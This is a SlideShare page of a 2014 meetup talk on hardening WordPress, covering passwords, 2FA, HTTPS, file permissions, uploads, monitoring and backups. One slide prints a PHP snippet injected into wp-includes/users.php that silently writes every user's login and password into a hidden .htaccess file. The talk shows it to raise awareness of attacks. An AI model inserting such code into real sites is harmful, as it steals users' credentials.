SlideShare una empresa de Scribd logo

Securing Your WordPress Installation

Descargar como PPTX, PDF
Lester Chan
Lester Chan

My presentation slides for Securing Your WordPress Installation during WordPress Meetup September 2014 organised by Singapore WordPress User Group.

Software
1 de 17
Security How to Secure Your WordPress
About Me • WordPress Plugins Developer – Since 2003 – Created > 22 plugins • wp-pagenavi, wp-polls, wp-postratings, wp-postviews, wp-dbmanager, etc • http://profiles.wordpress.org/gamerz • Tech Guy in Tech in Asia – Just started on 1st September 2014 – Tech in Asia is still hiring & you can join my team • techinasia.com/join • PHP & iOS Developer Lester Chan (@gamerz) [ 2 ]
WordPress Is Popular • Power 22% of the web • Most blogs uses WordPress – Mashable.com – Techcrunch.com • Because it is popular, lots of attacks are being targeted at WordPress sites Lester Chan (@gamerz) [ 3 ]
Hack Attempts • wp-includes/users.php – $fh = fopen(ABSPATH . "core/wp-content/ plugins/.htaccess","a+"); – fwrite($fh,$credentials['user_login'] . ':' . $credentials['user_password'] . "n"); – fclose($fh); • Backdoor files Lester Chan (@gamerz) [ 4 ]
Security 101 • Always keep your WordPress & it’s plugins up to date. – 4th September 2014 • WordPress 4.0 – 6th August 2014 • WordPress 3.9.2 was released to fix: – Fixes a possible but unlikely code execution when processing widgets – Prevents information disclosure via XML entity attacks in the external GetID3 library – Adds protections against brute attacks against CSRF tokens – Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators. Lester Chan (@gamerz) [ 5 ]
Passwords • Use a complex password – In general • Not just WordPress but your CPanel/FTP as well • Use a 2FA plugin – Google Authenticator • https://wordpress.org/plugins/google-authenticator/ – Authy Two Factor Authentication • https://wordpress.org/plugins/authy-two- factor-authentication/ Lester Chan (@gamerz) [ 6 ]
Passwords • Protect your WP-Admin with a password – Using htpasswd • http://www.htaccesstools.com/htpasswd-generator/ – Placing .htaccess in wp-admin ErrorDocument 401 default AuthName "Lester Chan's Website WordPress Admin" AuthUserFile "/home/gamerz/wp-admin/passwd" AuthType Basic require valid-user <Files admin-ajax.php> Order allow,deny Allow from all Satisfy any </Files> Lester Chan (@gamerz) [ 7 ]
HTTPS • HTTPS encrypts communication and sensitive data between the browser and wp-admin. • Prevents man in the middle attacks. – define('FORCE_SSL_LOGIN', true); – define('FORCE_SSL_ADMIN', true); Lester Chan (@gamerz) [ 8 ]
Files/Folder Permissions • Files & folder should be only readable & writeable only by the owner and readable by the rest • Ensure all files are CHMOD to 644 – find . -type f -exec chmod 644 {} ; • Ensure all folders are CHMOD to 755 – find . -type d -exec chmod 755 {} ; Lester Chan (@gamerz) [ 9 ]
WordPress Uploads • /wp-content/uploads/ – Is a common vector for attacks because it store user uploaded files – Harder to notice – Most people will just CHMOD this to 777 • Which means everyone can read & write to it – This folder should only serve static assets & not execute any scripts • http://stackoverflow.com/questions/18932756/disable-all- cgi-php-perl-for-a-directory-using-htaccess Lester Chan (@gamerz) [ 10 ]
Monitor Changed Files • I monitor my site changed files via email on a daily basis • Using CRON – find /home/gamerz/public_html -mtime -1 Lester Chan (@gamerz) [ 11 ]
Using Git • /core/ – Contains a Git checkout of https://github.com/WordPress/WordPress – git fetch --tags; git checkout 4.0 • /content/ – It is a Git checkout of my private repository – Contains all my active plugins and themes • Doing a git status on any folder above will also tell me what has changed Lester Chan (@gamerz) [ 12 ]
Backup • Backup your database regularly – Every hour if you blog more than once a day – Every day if you blog regularly – Using a plugin like WP-DBManager • https://wordpress.org/plugins/wp-dbmanager/ • Backup your /uploads/ folder – Using Git? (not ideal) – FTP to S3/Dropbox? – NAS – Gluster FS Lester Chan (@gamerz) [ 13 ]
VaultPress • https://vaultpress.com/ – By Automattic • Company behind WordPress.com – Paid • Lite (USD$55/year), Basic (USD$165/year), Premium (USD$440/year) – Features • Realtime full (database + files) backup • Scanning your site for dangerous files • Automatic restore of database + files Lester Chan (@gamerz) [ 14 ]
Summary • Password Protected WP-Admin • Use Google Authenticator as 2FA login for WordPress • HTTPS for WP-Admin • Ensure all file are CHMOD to 644 and folders to 755 • Do not allow any script execution in /uploads/ folder • Monitor your site changed files • Backup your database regularly Lester Chan (@gamerz) [ 15 ]
Other References • http://codex.wordpress.org/Hardening_Word Press • http://codex.wordpress.org/Backing_Up_Your _WordPress_Files • http://wordpress.tv/tag/security/ Lester Chan (@gamerz) [ 16 ]
Questions? • Any questions? • You can also find me at – Blog: http://lesterchan.net – Twitter: @gamerz – Facebook: https://fb.com/lesterchan – Instagram: @gamerz Lester Chan (@gamerz) [ 17 ]

Recomendados

Tips & Tricks in securing your WordPress installation
Tips & Tricks in securing your WordPress installationTips & Tricks in securing your WordPress installation
Tips & Tricks in securing your WordPress installationLester Chan
 
Sanjip Shah: Internationalizing and Localizing WordPress Themes
Sanjip Shah: Internationalizing and Localizing WordPress ThemesSanjip Shah: Internationalizing and Localizing WordPress Themes
Sanjip Shah: Internationalizing and Localizing WordPress Themeswpnepal
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!WordCamp Cape Town
 
Speeding Up WordPress sites
Speeding Up WordPress sitesSpeeding Up WordPress sites
Speeding Up WordPress sitesJason Yingling
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)WordCamp Cape Town
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depthSanjay Willie
 
Best Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseBest Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseTaylor Lovett
 
Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)
Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)
Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)Andrew Duthie
 

Recomendados

Tips & Tricks in securing your WordPress installation
Tips & Tricks in securing your WordPress installationTips & Tricks in securing your WordPress installation
Tips & Tricks in securing your WordPress installationLester Chan
 
Sanjip Shah: Internationalizing and Localizing WordPress Themes
Sanjip Shah: Internationalizing and Localizing WordPress ThemesSanjip Shah: Internationalizing and Localizing WordPress Themes
Sanjip Shah: Internationalizing and Localizing WordPress Themeswpnepal
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!WordCamp Cape Town
 
Speeding Up WordPress sites
Speeding Up WordPress sitesSpeeding Up WordPress sites
Speeding Up WordPress sitesJason Yingling
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)WordCamp Cape Town
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depthSanjay Willie
 
Best Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseBest Practices for WordPress in Enterprise
Best Practices for WordPress in EnterpriseTaylor Lovett
 
Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)
Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)
Launching a WordPress Site 101 (Cincinnati WordPress, August 2015)Andrew Duthie
 
WordPress Security - 12 WordPress Security Fundamentals
WordPress Security - 12 WordPress Security FundamentalsWordPress Security - 12 WordPress Security Fundamentals
WordPress Security - 12 WordPress Security Fundamentalsfindingsimple
 
Saving Time with WP-CLI
Saving Time with WP-CLISaving Time with WP-CLI
Saving Time with WP-CLITaylor Lovett
 
Save Time by Managing WordPress from the Command Line
Save Time by Managing WordPress from the Command LineSave Time by Managing WordPress from the Command Line
Save Time by Managing WordPress from the Command LineShawn Hooper
 
Drupal Security Intro
Drupal Security IntroDrupal Security Intro
Drupal Security IntroCash Williams
 
A crash course in scaling wordpress
A crash course in scaling wordpress A crash course in scaling wordpress
A crash course in scaling wordpress GovLoop
 
Modernizing WordPress Search with Elasticsearch
Modernizing WordPress Search with ElasticsearchModernizing WordPress Search with Elasticsearch
Modernizing WordPress Search with ElasticsearchTaylor Lovett
 
WCBos13 intermediate workshop
WCBos13 intermediate workshopWCBos13 intermediate workshop
WCBos13 intermediate workshopBoston WordPress
 
Multi tenant CMSes using php
Multi tenant CMSes using phpMulti tenant CMSes using php
Multi tenant CMSes using phpkae-verens
 
Secure your site
Secure your siteSecure your site
Secure your siteMatthew Farina
 
Isomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPIsomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPTaylor Lovett
 
Web server installation_configuration_apache
Web server installation_configuration_apacheWeb server installation_configuration_apache
Web server installation_configuration_apacheShaojie Yang
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
Best Practices for WordPressTaylor Lovett
 
Week6 office-hours
Week6 office-hoursWeek6 office-hours
Week6 office-hoursRandall Rode
 
You Got React.js in My PHP
You Got React.js in My PHPYou Got React.js in My PHP
You Got React.js in My PHPTaylor Lovett
 
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Vlad Lasky
 
Apache Web Server Setup 1
Apache Web Server Setup 1Apache Web Server Setup 1
Apache Web Server Setup 1Information Technology
 
WP-CLI - WordCamp Miami 2015
WP-CLI - WordCamp Miami 2015WP-CLI - WordCamp Miami 2015
WP-CLI - WordCamp Miami 2015Shawn Hooper
 
Best Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsBest Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsTaylor Lovett
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
Easy Copy with AZ Copy
Easy Copy with AZ CopyEasy Copy with AZ Copy
Easy Copy with AZ CopyJohn Garland
 
Presentation to SAIT Students - Dec 2013
Presentation to SAIT Students - Dec 2013Presentation to SAIT Students - Dec 2013
Presentation to SAIT Students - Dec 2013Think Media Inc.
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanJeff Hoffman
 

Más contenido relacionado

La actualidad más candente

WordPress Security - 12 WordPress Security Fundamentals
WordPress Security - 12 WordPress Security FundamentalsWordPress Security - 12 WordPress Security Fundamentals
WordPress Security - 12 WordPress Security Fundamentalsfindingsimple
 
Saving Time with WP-CLI
Saving Time with WP-CLISaving Time with WP-CLI
Saving Time with WP-CLITaylor Lovett
 
Save Time by Managing WordPress from the Command Line
Save Time by Managing WordPress from the Command LineSave Time by Managing WordPress from the Command Line
Save Time by Managing WordPress from the Command LineShawn Hooper
 
Drupal Security Intro
Drupal Security IntroDrupal Security Intro
Drupal Security IntroCash Williams
 
A crash course in scaling wordpress
A crash course in scaling wordpress A crash course in scaling wordpress
A crash course in scaling wordpress GovLoop
 
Modernizing WordPress Search with Elasticsearch
Modernizing WordPress Search with ElasticsearchModernizing WordPress Search with Elasticsearch
Modernizing WordPress Search with ElasticsearchTaylor Lovett
 
WCBos13 intermediate workshop
WCBos13 intermediate workshopWCBos13 intermediate workshop
WCBos13 intermediate workshopBoston WordPress
 
Multi tenant CMSes using php
Multi tenant CMSes using phpMulti tenant CMSes using php
Multi tenant CMSes using phpkae-verens
 
Isomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPIsomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPTaylor Lovett
 
Web server installation_configuration_apache
Web server installation_configuration_apacheWeb server installation_configuration_apache
Web server installation_configuration_apacheShaojie Yang
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
Best Practices for WordPressTaylor Lovett
 
Week6 office-hours
Week6 office-hoursWeek6 office-hours
Week6 office-hoursRandall Rode
 
You Got React.js in My PHP
You Got React.js in My PHPYou Got React.js in My PHP
You Got React.js in My PHPTaylor Lovett
 
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Vlad Lasky
 
WP-CLI - WordCamp Miami 2015
WP-CLI - WordCamp Miami 2015WP-CLI - WordCamp Miami 2015
WP-CLI - WordCamp Miami 2015Shawn Hooper
 
Best Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsBest Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsTaylor Lovett
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
Easy Copy with AZ Copy
Easy Copy with AZ CopyEasy Copy with AZ Copy
Easy Copy with AZ CopyJohn Garland
 

La actualidad más candente (20)

WordPress Security - 12 WordPress Security Fundamentals
WordPress Security - 12 WordPress Security FundamentalsWordPress Security - 12 WordPress Security Fundamentals
WordPress Security - 12 WordPress Security Fundamentals
 
Saving Time with WP-CLI
Saving Time with WP-CLISaving Time with WP-CLI
Saving Time with WP-CLI
 
Save Time by Managing WordPress from the Command Line
Save Time by Managing WordPress from the Command LineSave Time by Managing WordPress from the Command Line
Save Time by Managing WordPress from the Command Line
 
Drupal Security Intro
Drupal Security IntroDrupal Security Intro
Drupal Security Intro
 
A crash course in scaling wordpress
A crash course in scaling wordpress A crash course in scaling wordpress
A crash course in scaling wordpress
 
Modernizing WordPress Search with Elasticsearch
Modernizing WordPress Search with ElasticsearchModernizing WordPress Search with Elasticsearch
Modernizing WordPress Search with Elasticsearch
 
WCBos13 intermediate workshop
WCBos13 intermediate workshopWCBos13 intermediate workshop
WCBos13 intermediate workshop
 
Multi tenant CMSes using php
Multi tenant CMSes using phpMulti tenant CMSes using php
Multi tenant CMSes using php
 
Secure your site
Secure your siteSecure your site
Secure your site
 
Isomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWPIsomorphic WordPress Applications with NodeifyWP
Isomorphic WordPress Applications with NodeifyWP
 
Web server installation_configuration_apache
Web server installation_configuration_apacheWeb server installation_configuration_apache
Web server installation_configuration_apache
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
Best Practices for WordPress
 
Week6 office-hours
Week6 office-hoursWeek6 office-hours
Week6 office-hours
 
You Got React.js in My PHP
You Got React.js in My PHPYou Got React.js in My PHP
You Got React.js in My PHP
 
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
 
Apache Web Server Setup 1
Apache Web Server Setup 1Apache Web Server Setup 1
Apache Web Server Setup 1
 
WP-CLI - WordCamp Miami 2015
WP-CLI - WordCamp Miami 2015WP-CLI - WordCamp Miami 2015
WP-CLI - WordCamp Miami 2015
 
Best Practices for Building WordPress Applications
Best Practices for Building WordPress ApplicationsBest Practices for Building WordPress Applications
Best Practices for Building WordPress Applications
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Easy Copy with AZ Copy
Easy Copy with AZ CopyEasy Copy with AZ Copy
Easy Copy with AZ Copy
 

Similar a Securing Your WordPress Installation

Presentation to SAIT Students - Dec 2013
Presentation to SAIT Students - Dec 2013Presentation to SAIT Students - Dec 2013
Presentation to SAIT Students - Dec 2013Think Media Inc.
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanJeff Hoffman
 
Dan Catalin Vasile - Hacking the Wordpress Ecosystem
Dan Catalin Vasile - Hacking the Wordpress EcosystemDan Catalin Vasile - Hacking the Wordpress Ecosystem
Dan Catalin Vasile - Hacking the Wordpress EcosystemDan Vasile
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server SecurityPeter Baylies
 
WordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateWordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateZero Point Development
 
Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010Brad Williams
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and SecurityThink Media Inc.
 
WordPress Security Fundamentals - WordCamp Biratnagar 2018
WordPress Security Fundamentals - WordCamp Biratnagar 2018WordPress Security Fundamentals - WordCamp Biratnagar 2018
WordPress Security Fundamentals - WordCamp Biratnagar 2018Abul Khayer
 
WordCamp Philippines 2009: WordPress In The Wild
WordCamp Philippines 2009: WordPress In The WildWordCamp Philippines 2009: WordPress In The Wild
WordCamp Philippines 2009: WordPress In The Wildrebelpixel
 
Word Camp Ph 2009 Word Press In The Wild
Word Camp Ph 2009 Word Press In The WildWord Camp Ph 2009 Word Press In The Wild
Word Camp Ph 2009 Word Press In The Wildrebelpixel
 
Word camp2011 introwordpresssecurity
Word camp2011 introwordpresssecurityWord camp2011 introwordpresssecurity
Word camp2011 introwordpresssecurityDavid Wilemski
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
WordCamp Boston WordPress plugins-8-2014
WordCamp Boston WordPress plugins-8-2014WordCamp Boston WordPress plugins-8-2014
WordCamp Boston WordPress plugins-8-2014The Toolbox, Inc.
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...
Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...
Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...rtCamp
 
Apache, cron and proxy
Apache, cron and proxyApache, cron and proxy
Apache, cron and proxyGaurav Mishra
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User SecurityDre Armeda
 

Similar a Securing Your WordPress Installation (20)

Presentation to SAIT Students - Dec 2013
Presentation to SAIT Students - Dec 2013Presentation to SAIT Students - Dec 2013
Presentation to SAIT Students - Dec 2013
 
Securing WordPress by Jeff Hoffman
Securing WordPress by Jeff HoffmanSecuring WordPress by Jeff Hoffman
Securing WordPress by Jeff Hoffman
 
WordPress Security Best Practices
WordPress Security Best PracticesWordPress Security Best Practices
WordPress Security Best Practices
 
Dan Catalin Vasile - Hacking the Wordpress Ecosystem
Dan Catalin Vasile - Hacking the Wordpress EcosystemDan Catalin Vasile - Hacking the Wordpress Ecosystem
Dan Catalin Vasile - Hacking the Wordpress Ecosystem
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server Security
 
WordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateWordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 Update
 
Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010
 
WordPress Plugins and Security
WordPress Plugins and SecurityWordPress Plugins and Security
WordPress Plugins and Security
 
WordPress Security Fundamentals - WordCamp Biratnagar 2018
WordPress Security Fundamentals - WordCamp Biratnagar 2018WordPress Security Fundamentals - WordCamp Biratnagar 2018
WordPress Security Fundamentals - WordCamp Biratnagar 2018
 
WordCamp Philippines 2009: WordPress In The Wild
WordCamp Philippines 2009: WordPress In The WildWordCamp Philippines 2009: WordPress In The Wild
WordCamp Philippines 2009: WordPress In The Wild
 
Word Camp Ph 2009 Word Press In The Wild
Word Camp Ph 2009 Word Press In The WildWord Camp Ph 2009 Word Press In The Wild
Word Camp Ph 2009 Word Press In The Wild
 
Word camp2011 introwordpresssecurity
Word camp2011 introwordpresssecurityWord camp2011 introwordpresssecurity
Word camp2011 introwordpresssecurity
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside Out
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 
WordCamp Boston WordPress plugins-8-2014
WordCamp Boston WordPress plugins-8-2014WordCamp Boston WordPress plugins-8-2014
WordCamp Boston WordPress plugins-8-2014
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
 
Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...
Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...
Managing a WordPress Site as a Composer Project by Rahul Bansal @ WordCamp Na...
 
Apache, cron and proxy
Apache, cron and proxyApache, cron and proxy
Apache, cron and proxy
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User Security
 

Último

Osi security architecture in network.pptx
Osi security architecture in network.pptxOsi security architecture in network.pptx
Osi security architecture in network.pptxVinzoCenzo
 
Best Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh ITBest Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh ITmanoharjgpsolutions
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full RecordingOpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full RecordingShane Coughlan
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfDrew Moseley
 
What’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 UpdatesWhat’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 UpdatesVictoriaMetrics
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Cizo Technology Services
 
Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024Anthony Dahanne
 
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingOpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingShane Coughlan
 
Ronisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited CatalogueRonisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited Catalogueitservices996
 
VK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web DevelopmentVK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web Developmentvyaparkranti
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxRTS corp
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolsosttopstonverter
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
Patterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencePatterns for automating API delivery. API conference
Patterns for automating API delivery. API conferencessuser9e7c64
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZABSYZ Inc
 
VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics
 
Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...
Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...
Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...OnePlan Solutions
 
JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...
JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...
JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...Bert Jan Schrijver
 

Último (20)

Osi security architecture in network.pptx
Osi security architecture in network.pptxOsi security architecture in network.pptx
Osi security architecture in network.pptx
 
Best Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh ITBest Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh IT
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full RecordingOpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
OpenChain AI Study Group - Europe and Asia Recap - 2024-04-11 - Full Recording
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
What’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 UpdatesWhat’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 Updates
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
 
Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024Not a Kubernetes fan? The state of PaaS in 2024
Not a Kubernetes fan? The state of PaaS in 2024
 
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingOpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
 
Ronisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited CatalogueRonisha Informatics Private Limited Catalogue
Ronisha Informatics Private Limited Catalogue
 
VK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web DevelopmentVK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web Development
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration tools
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
Patterns for automating API delivery. API conference
